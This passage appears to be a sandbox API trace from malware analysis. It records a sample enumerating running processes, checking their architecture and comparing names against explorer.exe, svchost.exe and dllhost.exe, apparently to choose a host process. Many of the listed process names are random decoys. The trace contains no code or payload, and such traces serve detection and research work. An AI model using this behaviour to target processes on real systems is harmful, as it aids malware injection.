dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0253.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0253.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0253.336] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.336] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.336] CloseHandle (hObject=0xec) returned 1 [0253.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0253.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0253.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0253.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0253.338] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.338] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.338] CloseHandle (hObject=0xec) returned 1 [0253.338] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0253.338] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0253.338] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0253.338] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0253.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0253.339] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.339] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.339] CloseHandle (hObject=0xec) returned 1 [0253.339] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0253.339] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0253.339] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0253.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0253.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0253.339] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.339] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.339] CloseHandle (hObject=0xec) returned 1 [0253.339] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0253.339] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0253.339] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0253.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0253.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0253.340] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.340] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.340] CloseHandle (hObject=0xec) returned 1 [0253.340] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0253.340] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0253.340] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0253.340] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0253.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0253.341] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.341] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.341] CloseHandle (hObject=0xec) returned 1 [0253.341] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0253.341] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0253.341] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0253.341] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0253.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0253.341] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.341] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.341] CloseHandle (hObject=0xec) returned 1 [0253.341] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0253.341] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0253.342] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0253.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0253.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0253.342] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.342] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.342] CloseHandle (hObject=0xec) returned 1 [0253.342] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0253.342] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0253.342] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0253.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0253.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0253.343] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.343] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.343] CloseHandle (hObject=0xec) returned 1 [0253.343] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0253.343] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0253.343] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0253.343] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0253.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0253.343] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.343] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.343] CloseHandle (hObject=0xec) returned 1 [0253.343] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0253.344] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0253.344] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0253.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0253.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0253.344] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.344] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.344] CloseHandle (hObject=0xec) returned 1 [0253.344] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0253.344] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0253.344] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0253.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0253.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0253.345] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.345] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.345] CloseHandle (hObject=0xec) returned 1 [0253.345] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0253.345] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0253.345] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0253.345] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0253.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0253.345] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.345] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.345] CloseHandle (hObject=0xec) returned 1 [0253.346] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0253.346] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0253.346] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0253.346] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0253.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0253.346] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.346] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.346] CloseHandle (hObject=0xec) returned 1 [0253.346] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0253.346] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0253.346] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0253.346] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0253.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0253.347] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.347] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.347] CloseHandle (hObject=0xec) returned 1 [0253.347] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0253.347] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0253.347] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0253.347] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0253.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0253.347] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.348] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.348] CloseHandle (hObject=0xec) returned 1 [0253.348] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0253.348] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0253.348] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0253.348] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0253.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0253.348] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.348] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.348] CloseHandle (hObject=0xec) returned 1 [0253.348] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0253.348] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0253.348] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0253.348] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0253.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0253.349] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.349] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.349] CloseHandle (hObject=0xec) returned 1 [0253.349] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0253.349] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0253.349] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0253.349] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0253.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0253.349] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.350] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.350] CloseHandle (hObject=0xec) returned 1 [0253.350] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0253.350] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0253.350] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0253.350] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0253.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0253.350] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.350] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.350] CloseHandle (hObject=0xec) returned 1 [0253.350] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0253.350] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0253.350] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0253.350] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0253.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0253.351] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.351] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.351] CloseHandle (hObject=0xec) returned 1 [0253.351] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0253.351] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0253.351] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0253.351] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0253.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0253.352] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.352] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.352] CloseHandle (hObject=0xec) returned 1 [0253.352] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0253.352] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0253.352] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0253.352] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0253.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0253.352] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0253.353] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0253.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0253.353] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0253.354] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0253.354] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0253.355] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.355] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.355] CloseHandle (hObject=0xec) returned 1 [0253.355] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0253.355] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.355] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.355] CloseHandle (hObject=0xec) returned 1 [0253.355] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0253.356] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.356] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.356] CloseHandle (hObject=0xec) returned 1 [0253.356] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0253.356] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0253.356] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.356] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0253.357] CloseHandle (hObject=0xec) returned 1 [0253.357] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.357] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, 